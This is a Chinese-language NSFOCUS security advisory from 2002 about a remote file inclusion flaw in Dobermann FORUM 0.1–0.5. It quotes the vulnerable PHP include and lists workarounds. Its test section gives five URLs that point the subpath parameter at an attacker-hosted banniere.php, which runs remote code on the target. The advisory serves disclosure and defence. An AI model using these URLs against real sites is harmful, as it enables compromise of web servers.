首页 -> 安全研究

安全研究

安全漏洞
Benjamin Lefevre Dobermann Forum远程文件包含漏洞

发布日期:2002-10-28
更新日期:2002-11-07

受影响系统:
Benjamin Lefevre Dobermann FORUM 0.5
Benjamin Lefevre Dobermann FORUM 0.4
Benjamin Lefevre Dobermann FORUM 0.3
Benjamin Lefevre Dobermann FORUM 0.2
Benjamin Lefevre Dobermann FORUM 0.1
描述:
BUGTRAQ  ID: 6057

dobermann FORUM是一款由PHP编写基于WEB的论坛程序。

dobermann FORUM中部分脚本不正确使用Include()函数,远程攻击者可以利用这个漏洞包含远程服务器上的任意文件,导致文件中的代码以WEB进程权限执行。

论坛中entete.php,enteteacceuil.php,topic/entete.php脚本使用了如下代码:

<?php @include $$subpath."banniere.php ";  >  

但是没有对变量$$subpath进行定义,攻击者可以在自己控制的服务器上建立包含恶意PHP代码的文件,通过$$subpath变量包含远程服务器上的文件,可以导致以WEB进程权限执行文件中的PHP代码。

<*来源:Frog Man
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103583521407007&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Frog Man 提供了如下测试方法:

http://[target]/entete.php?subpath=http://[attacker]/banniere.php
http://[target]/enteteacceuil.php?subpath=http://[attacker]/banniere.php
http://[target]/topic/entete.php?subpath=http://[attacker]/banniere.php
http://[target]/index.php?subpath=http://[attacker]/banniere.php
http://[target]/newtopic.php?subpath=http://[attacker]/banniere.php

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在php.ini配置文件中设置'allow_url_fopen'和'register_globals'为'off'。

* "'Frog Man'" <leseulfrog@hotmail.com>提供了如下临时解决方案:

使用<?php $banfile=$subpath."banniere.php"; if (file_exists($banfile)){ @include $banfile; } ?> 代替如下代码:

<?php @include $subpath."banniere.php"; ?>

* "Mark Stunnenberg" <marksg@chello.nl>提供了如下临时解决方案:

把如下行放置在$subpath变量设置之前:

<? $subpath = ''; ?>

厂商补丁:

Benjamin
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.le-dobermann.com/

浏览次数:3127
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障